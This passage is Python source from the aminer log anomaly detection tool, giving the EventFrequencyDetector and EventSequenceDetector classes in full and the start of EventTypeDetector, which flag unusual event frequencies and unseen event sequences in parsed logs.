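MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .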
""" import os import logging import numpy as np import math from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventFrequencyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when event or value frequencies change.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, scoring_path_list=None, unique_path_list=None, window_size=600, num_windows=50, confidence_factor=0.33, empty_window_warnings=True, early_exceeding_anomaly_output=False, set_lower_limit=None, set_upper_limit=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, season=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. 
@param unique_path_list parser paths of values where only unique value occurrences should be counted for every value occurring in target_path_list. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param num_windows the number of previous time windows considered for expected frequency estimation. @param confidence_factor defines range of tolerable deviation of measured frequency from expected frequency according to occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3*sigma deviation. confidence_factor must be in range [0, 1]. @param empty_window_warnings whether anomalies should be generated for too small window sizes. @param early_exceeding_anomaly_output states if an anomaly should be raised the first time the appearance count exceeds the range. @param set_lower_limit sets the lower limit of the frequency test to the specified value. @param set_upper_limit sets the upper limit of the frequency test to the specified value. @param persistence_id name of persistence document. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. @param season the seasonality/periodicity of the time-series in seconds. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, scoring_path_list=scoring_path_list, unique_path_list=unique_path_list, window_size=window_size, num_windows=num_windows, confidence_factor=confidence_factor, empty_window_warnings=empty_window_warnings, early_exceeding_anomaly_output=early_exceeding_anomaly_output, set_lower_limit=set_lower_limit, set_upper_limit=set_upper_limit, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.next_check_time = None self.counts = {} self.scoring_value_list = {} self.unique_values = {} self.ranges = {} self.exceeded_range_frequency = {} self.log_windows = 0 self.last_seen_log = {} if season is not None: lookback = math.ceil(season / window_size) if lookback > num_windows: logging.getLogger(DEBUG_LOG_NAME).warning(str(self.__class__.__name__) + ' requires num_windows to be at least ' + str(lookback) + '; seasonality is ignored.') self.lookback = None else: self.lookback = lookback else: self.lookback = None self.season = season self.time_index = {} self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == 
source: return False parser_match = log_atom.parser_match self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # Get values that occur in unique_path_list unique_path_value = None if self.unique_path_list is not None and len(self.unique_path_list) != 0: values = [] for path in self.unique_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): 
value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) values.append(value) # Initialize unique values for current log event if log_event not in self.unique_values: self.unique_values[log_event] = set() unique_path_value = tuple(values) # Store copy of last seen instance of raw log event to correctly show affected event type when anomaly occurs. self.last_seen_log[log_event] = log_atom if self.season is not None and log_event not in self.time_index: self.time_index[log_event] = [math.floor((log_atom.atom_time % self.season) / self.window_size)] if self.next_check_time is None: # First processed log atom, initialize next check time. self.next_check_time = log_atom.atom_time + self.window_size self.log_windows += 1 elif log_atom.atom_time >= self.next_check_time: # Log atom exceeded next check time; time window is complete. self.next_check_time += self.window_size self.log_windows += 1 # Update next_check_time if a time window was skipped skipped_windows = 0 if log_atom.atom_time >= self.next_check_time: skipped_windows = 1 + math.floor((log_atom.atom_time - self.next_check_time) / self.window_size) self.next_check_time = self.next_check_time + skipped_windows * self.window_size # Output anomaly in case that no log event occurs within a time window if self.empty_window_warnings is True: analysis_component = {"AffectedLogAtomPaths": self.target_path_list} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "No log events received in time window", [""], event_data, log_atom, self) for log_ev in self.counts: if log_ev not in self.last_seen_log: # In case that the AMiner was restarted, it is possible that no instance of the event has been seen; # use current log atom instead self.last_seen_log[log_ev] = log_atom # Check if ranges should be initialised if log_ev not in self.ranges: self.ranges[log_ev] = None 
self.exceeded_range_frequency[log_ev] = False # Calculate the ranges if it was not already calculated if self.ranges[log_ev] is None: self.ranges[log_ev] = self.calculate_range(log_ev) if log_ev not in self.counts or (len(self.counts[log_ev]) < 2 and ( self.set_lower_limit is None or self.set_upper_limit is None)): # At least counts from 1 window necessary for prediction self.reset_counter(log_ev, log_atom) continue # Compare log event frequency of previous time windows and current time window if self.counts[log_ev][-1] < self.ranges[log_ev][0] or self.counts[log_ev][-1] > self.ranges[log_ev][1]: occurrences_mean = (self.ranges[log_ev][0] + self.ranges[log_ev][1]) / 2 try: data = self.last_seen_log[log_ev].raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.last_seen_log[log_ev].raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [self.last_seen_log[log_ev].parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(log_ev)} confidence = 1 if max(occurrences_mean, self.counts[log_ev][-1]) != 0: confidence = 1 - min(occurrences_mean, self.counts[log_ev][-1]) / max(occurrences_mean, self.counts[log_ev][-1]) frequency_info = {"ExpectedLogAtomValuesFrequency": occurrences_mean, "ExpectedLogAtomValuesFrequencyRange": [ np.ceil(max(0, self.ranges[log_ev][0])), np.floor(self.ranges[log_ev][1])], "LogAtomValuesFrequency": self.counts[log_ev][-1], "WindowSize": self.window_size, "ConfidenceFactor": self.confidence_factor, "Confidence": confidence} # In case that scoring_path_list is set, give their values to the event handlers for further analysis. 
if len(self.scoring_path_list) > 0: frequency_info["IdValues"] = self.scoring_value_list[log_ev] event_data = {"AnalysisComponent": analysis_component, "FrequencyData": frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Frequency anomaly detected", sorted_log_lines, event_data, self.last_seen_log[log_ev], self) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Reset exceeded_range_frequency to output a warning when the count exceedes the ranges next time self.exceeded_range_frequency[log_ev] = False # Reset counter and range estimation for _ in range(skipped_windows + 1): self.reset_counter(log_ev, log_atom) self.ranges[log_ev] = None # Reset all stored unique values for every log event for log_ev in self.unique_values: self.unique_values[log_ev] = set() elif self.early_exceeding_anomaly_output and log_event in self.counts and (len(self.counts[log_event]) >= 2 or ( self.set_lower_limit is not None and self.set_upper_limit is not None)): # Check if the count exceeds the range and output a warning the first time the range exceeds it if log_event not in self.ranges: self.ranges[log_event] = None self.exceeded_range_frequency[log_event] = False # Calculate the ranges if it was not already calculated if self.ranges[log_event] is None: self.ranges[log_event] = self.calculate_range(log_event) # Compare log event frequency of previous time windows and current time window if self.counts[log_event][-1] > self.ranges[log_event][1] and not self.exceeded_range_frequency[log_event]: occurrences_mean = (self.ranges[log_event][0] + self.ranges[log_event][1]) / 2 self.exceeded_range_frequency[log_event] = True try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: 
original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(log_event)} frequency_info = {"ExpectedLogAtomValuesFrequency": occurrences_mean, "ExpectedLogAtomValuesFrequencyRange": [ np.ceil(max(0, self.ranges[log_event][0])), np.floor(self.ranges[log_event][1])], "LogAtomValuesFrequency": self.counts[log_event][-1], "WindowSize": self.window_size, "ConfidenceFactor": self.confidence_factor} event_data = {"AnalysisComponent": analysis_component, "FrequencyData": frequency_info} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Frequency exceeds range for the first time", sorted_log_lines, event_data, log_atom, self) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Get the id list if the scoring_path_list is set and save it for the anomaly message if len(self.scoring_path_list) > 0: for scoring_path in self.scoring_path_list: scoring_match = log_atom.parser_match.get_match_dictionary().get(scoring_path) if scoring_match is not None: # Get the value of the current path if isinstance(scoring_match.match_object, bytes): scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING) else: scoring_value = scoring_match.match_object # Save the value in the list if log_event in self.counts: self.scoring_value_list[log_event].append(scoring_value) else: self.scoring_value_list[log_event] = [scoring_value] # Increase count for observed events if log_event in self.counts: if unique_path_value is not None: # When unique path is set, only increase 
count when value has not been observed before if unique_path_value not in self.unique_values[log_event]: self.counts[log_event][-1] += 1 self.unique_values[log_event].add(unique_path_value) else: self.counts[log_event][-1] += 1 else: self.counts[log_event] = [1] self.log_success += 1 # Switching the learn mode is placed at the end of receive_atom to ensure that last time window before switching is added to model if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the " + str(self.__class__.__name__) + ".") self.learn_mode = False return True def reset_counter(self, log_event, log_atom): """Create count index for new time window.""" if self.learn_mode is True: if len(self.counts[log_event]) <= self.num_windows + 1: self.counts[log_event].append(0) else: self.counts[log_event] = self.counts[log_event][1:] + [0] else: self.counts[log_event][-1] = 0 if self.lookback is not None: # Update seasonal index of value to be predicted if log_event in self.time_index: self.time_index[log_event].append((self.time_index[log_event][-1] + 1) % self.lookback) # Align length of self.time_index to self.counts self.time_index[log_event] = self.time_index[log_event][-len(self.counts[log_event]):] else: self.time_index[log_event] = [math.floor((log_atom.atom_time % self.season) / self.window_size)] # Reset scoring_value_list if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event] = [] def calculate_range(self, log_event): """Calculate the corresponding range to log_event.""" if self.set_lower_limit is None or self.set_upper_limit is None: if log_event not in self.counts or len(self.counts[log_event]) < 2: return None season_offset = 0 if self.lookback is not None and len(self.counts[log_event]) > self.lookback + 2: counts_tmp = [] season_offset_list = [] current_index = self.time_index[log_event][-1] for i in range(0, len(self.counts[log_event]) - 
1): # Get all values where lag of size season can be differentiated if i >= self.lookback: counts_tmp.append(self.counts[log_event][i] - self.counts[log_event][i - self.lookback]) # Get all values that lag a multiple of seasonality lookback behind if self.time_index[log_event][i] == current_index: season_offset_list.append(self.counts[log_event][i]) season_offset = np.mean(season_offset_list) else: counts_tmp = self.counts[log_event] occurrences_mean = -1 occurrences_std = -1 occurrences_mean = np.mean(counts_tmp[-self.num_windows-1:-1]) if len(counts_tmp[-self.num_windows-1:-1]) > 1: # Only compute standard deviation for at least 2 observed counts occurrences_std = np.std(counts_tmp[-self.num_windows-1:-1]) else: # Otherwise use default value so that only (1 - confidence_factor) relevant (other factor cancels out) occurrences_std = np.mean(self.counts[log_event][-self.num_windows-1:-1]) * (1 - self.confidence_factor) # Calculate limits if self.set_lower_limit is not None: lower_limit = self.set_lower_limit else: lower_limit = occurrences_mean + season_offset - occurrences_std / self.confidence_factor if self.set_upper_limit is not None: upper_limit = self.set_upper_limit else: upper_limit = occurrences_mean + season_offset + occurrences_std / self.confidence_factor return [lower_limit, upper_limit] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [] for log_ev, freqs in self.counts.items(): # Skip last count as the time window may not be complete yet and count thus too low 
time_ind = [] if log_ev in self.time_index: time_ind = self.time_index[log_ev][:-1] persist_data.append((log_ev, freqs[:-1], time_ind)) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + " persisted data.") def load_persistence_data(self): """Load the persistence data from storage.""" # Persisted data contains lists of event-frequency pairs, i.e., # [[, [], []], [, [], []], ...] persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for entry in persistence_data: log_event = entry[0] freqs = entry[1] time_ind = entry[2] # In case that num_windows differ, only take as many as possible self.counts[tuple(log_event)] = freqs[max(0, len(freqs) - self.num_windows - 1):] + [0] if len(time_ind) > 0: self.time_index[tuple(log_event)] = time_ind[max(0, len(freqs) - self.num_windows - 1):] # Add another time index to fit new length of self.counts self.time_index[tuple(log_event)].append((self.time_index[tuple(log_event)][-1] + 1) % self.lookback) if len(self.scoring_path_list) > 0: self.scoring_value_list[tuple(log_event)] = [] logging.getLogger(DEBUG_LOG_NAME).debug(str(self.__class__.__name__) + " loaded persistence data.") def print_persistence_event(self, event_type, event_data): """Prints the persistency of component_name. Event_data specifies what information is outputed. @return a message with information about the persistency. @throws Exception when the output for the event_data was not possible. 
""" if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and (self.target_path_list is None or ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)])) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = "Event_data has the wrong format. " \ "The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same " \ "length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.counts.keys()) values_list = list(values_set) values_list.sort() string = f"Event frequency is tracked for the following path values: {values_list}" elif len(event_data) == 1: # Set output string if event_data[0] in self.counts and self.ranges[event_data[0]] is not None: if self.counts[event_data[0]][-1] < self.ranges[event_data[0]][0] or\ self.counts[event_data[0]][-1] > self.ranges[event_data[0]][1]: string = f"The current count {self.counts[event_data[0]][-1]} is outside the frequency interval ["\ f"{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. "\ f"The count will reset at {self.next_check_time} (unix time stamp)" else: string = f"The current count {self.counts[event_data[0]][-1]} is in the frequency interval ["\ f"{self.ranges[event_data[0]][0]}, {self.ranges[event_data[0]][1]}] for {event_data[0]}. 
"\ f"The count will reset at {self.next_check_time} (unix time stamp)" else: string = f"Persistency includes no information for {event_data[0]}." return string def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. 
""" if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + " out of " + str(self.log_total) + " log atoms successfully in " + str(self.log_windows) + " time windows in the last 60 minutes.") elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'" + str(component_name) + "' processed " + str(self.log_success) + " out of " + str(self.log_total) + " log atoms successfully in " + str(self.log_windows) + " time windows in the last 60 minutes.") self.log_success = 0 self.log_total = 0 self.log_windows = 0 def get_weight_analysis_field_path(self): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" if self.scoring_path_list: return ["FrequencyData", "IdValues"] return [] def get_weight_output_field_path(self): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" if self.scoring_path_list: return ["FrequencyData", "Scoring"] return [] EventSequenceDetector.py000066400000000000000000000416701500476301700355750ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest, S., Hofmeyr, S. A., Somayaji, A., & Longstaff, T. A. (1996, May). A sense of self for unix processes. In Proceedings of the 1996 IEEE Symposium on Security and Privacy (pp. 120-128). IEEE. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventSequenceDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when new event or value sequences were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list=None, target_path_list=None, seq_len=3, allow_missing_id=False, timeout=None, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. 
@param id_path_list one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available. @param seq_len the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). @param timeout maximum allowed seconds between two entries of sequence; sequence is split in subsequences if exceeded. @param persistence_id name of persistence file. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. 
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, id_path_list=id_path_list, target_path_list=target_path_list, seq_len=seq_len, allow_missing_id=allow_missing_id, timeout=timeout, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.sequences = set() self.current_sequences = {} self.last_seen_times = {} self.log_learned = 0 self.log_learned_sequences = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False parser_match = log_atom.parser_match self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. 
for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) # the match variable is not needed any more and reused for the iteration. for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. 
return False else: matches = [] if isinstance(id_match, list): matches = id_match else: matches.append(id_match) for match in matches: if isinstance(match.match_object, bytes): id_tuple += (match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (match.match_object,) # Create entry for the id_tuple in the current_sequences dict if it did not occur before. if id_tuple not in self.current_sequences: self.current_sequences[id_tuple] = () # If too much time passed between two values, start a new sequence if self.timeout is not None: if id_tuple in self.last_seen_times and self.last_seen_times[id_tuple] is not None and \ log_atom.atom_time is not None and self.last_seen_times[id_tuple] + self.timeout < log_atom.atom_time: self.current_sequences[id_tuple] = () self.last_seen_times[id_tuple] = log_atom.atom_time # If the sequence has not reached its full length, append the newest element and stop. # Otherwise, the current sequence is used as a queue, where the oldest entry is removed. if len(self.current_sequences[id_tuple]) < self.seq_len: self.current_sequences[id_tuple] += (log_event,) if len(self.current_sequences[id_tuple]) != self.seq_len: self.log_success += 1 return True else: self.current_sequences[id_tuple] = self.current_sequences[id_tuple][1:] + (log_event,) # Report anomalies if the current processed sequence never occurred before. 
if self.current_sequences[id_tuple] not in self.sequences: if self.learn_mode is True: self.sequences.add(self.current_sequences[id_tuple]) self.log_learned += 1 self.log_learned_sequences.append(self.current_sequences[id_tuple]) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] if self.target_path_list is None or len(self.target_path_list) == 0: analysis_component = {"AffectedLogAtomPaths": self.current_sequences[id_tuple]} else: analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(self.current_sequences[id_tuple])} if self.id_path_list is not None: analysis_component["AffectedIdValues"] = list(id_tuple) event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New sequence detected", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write 
persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, sorted(list(self.sequences))) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" # Persisted data contains lists of sequences, i.e., [[, ], [. """ import logging from aminer import AminerConfig from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class EventTypeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This class keeps track of the found event types and the values of each variable.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id="Default", target_path_list=None, id_path_list=None, allow_missing_id=False, allowed_id_tuples=None, min_num_vals=1000, max_num_vals=1500, save_values=True, log_resource_ignore_list=None): 